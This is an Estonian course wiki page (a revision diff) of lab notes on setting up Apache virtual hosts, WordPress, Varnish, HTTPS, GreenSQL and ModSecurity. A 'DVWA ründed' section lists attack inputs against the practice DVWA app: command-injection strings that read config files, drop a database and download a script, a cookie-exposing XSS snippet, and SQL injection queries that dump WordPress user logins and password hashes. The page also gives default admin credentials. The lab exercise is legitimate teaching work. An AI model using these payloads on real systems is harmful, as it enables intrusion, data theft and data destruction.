Virtualhost apache2 näitel: Difference between revisions

From ICO wiki
Jump to navigationJump to search
Line 415: Line 415:
<source lang="bash">
<source lang="bash">
apt-get install libapache2-mod-security2
apt-get install libapache2-mod-security2
Muutke faili '''/etc/apache2/mods-available/security2.conf'''
<source lang="apache">
<IfModule security2_module>
        # Default Debian dir for modsecurity's persistent data
        SecDataDir /var/cache/modsecurity
        # Include all the *.conf files in /etc/modsecurity.
        # Keeping your local configuration in that directory
        # will allow for an easy upgrade of THIS file and
        # make your life easier
        IncludeOptional /etc/modsecurity/*.conf

Revision as of 12:03, 4 May 2015

Apache seadistamine

/etc/hosts  www.planet.zz  sales.planet.zz
ping www.planet.zz

ping sales.planet.zz    

apt-get update     
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz

cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static


ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz 
vim sales.planet.zz 

a2ensite www.planet.zz
a2ensite sales.planet.zz 
service apache2 reload

WordPress tuning

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName wp.planet.zz
        DocumentRoot /var/www/wordpress
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        <Directory /var/www/wordpress>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all

        ErrorLog ${APACHE_LOG_DIR}/error.log

        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn

        CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from ::1/128


Pange tähele muudetud Directory seadeid. <Directory /var/www/wordpress> AllowOverride All

echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite 
a2enmod headers 
a2enmod expires

Selle rea võib lisada alglaadimisel käivitatavasse faili /etc/rc.local

Paigaldage oma valitud cace plugin wordpressile.


Esmaselt tõstame apache2 porti 8080

NameVirtualHost *:8080
Listen 8080
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

grep ':80' *

service apache2 restart

netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"

Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine

sub vcl_recv {

  # Add a unique header containing the client address

  remove req.http.X-Forwarded-For;

  set    req.http.X-Forwarded-For = client.ip;

  # [...]


service varnish restart

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

cd /etc/apache2/sites-available/

Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

nano wp

Sinna tuleb kirjutada CustomLog'i rea asemele

CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

cd /etc/apache2/conf.d/

Tee sinna uus fail nimega näiteks varnishlog.conf

nano varnishlog.conf

Kirjuta sinna see rida

LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined

Tee apache2 teenusele restart

service apache2 restart

DVWA ründed

HTTPS konfigureerimine


Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key

Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
|            .    |
|           + .   |
|          o +    |
|           * o   |
|        S + O    |
|       ..+ + + . |
|       ...o o =  |
|        o+   o . |
|       .o.    E  |

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet 
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

Signature ok
Getting Private key

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

ServerName      www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile    /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

ID kaart

ID kaardiga autentimine Apache2 veebiserveriga

DVWA ründed

cmd exec; sed 's/</UUUU/' ../../config/; ls -l; ls -l ../; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada; sed 's/<//'  ../../../../wordpress/wp-config.php

Loon faili kala /var/tmp kataloogi; touch /var/tmp/kala.txt

Ning kontrollin kas fail loodi; ls /var/tmp/

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):;mysqladmin DROP dvwa -y;

kuvada failide infot:;cat /etc/apache2/sites-enabled/www.planet.zz

skripti laadimine serverisse ning sellele käivitusbiti andmine:; wget -O /var/tmp/skript; chmod +x /var/tmp/skript/

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)

; grep session.cookie_httponly /etc/php5/apache2/php.ini


  • kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

session.cookie_httponly = 1

  • kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

session.cookie_httponly = 0


<script>var i='<img src="'+document.cookie+'" />'; document.write(i);</script>

veel XSSi



1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union  select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #

GreenSQL firewall


dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c

Kasutajanimi veebiliidesel on admin ja parool pwd.

Muutke DVWA config failis andmebaasi asukohta:

$_DVWA[ 'db_server' ] = '';

#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start



apt-get install libapache2-mod-security2

Muutke faili /etc/apache2/mods-available/security2.conf

<IfModule security2_module>
        # Default Debian dir for modsecurity's persistent data
        SecDataDir /var/cache/modsecurity

        # Include all the *.conf files in /etc/modsecurity.
        # Keeping your local configuration in that directory
        # will allow for an easy upgrade of THIS file and
        # make your life easier
        IncludeOptional /etc/modsecurity/*.conf


Apache2 tweaks

ServerSignature Off
ServerTokens Prod

Apache testimine

Lisaks ab'le on olemas ka teisi utiliite:

1.Apache JMeter -
2. httperf -
3. OpenWebLoad -
4. Allmon -
5. CLIF -
6. curl-loader -
7. deluge(alates 2002 ei ole uusi versioone) -
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) -
9. FWPTT -
10. http_load -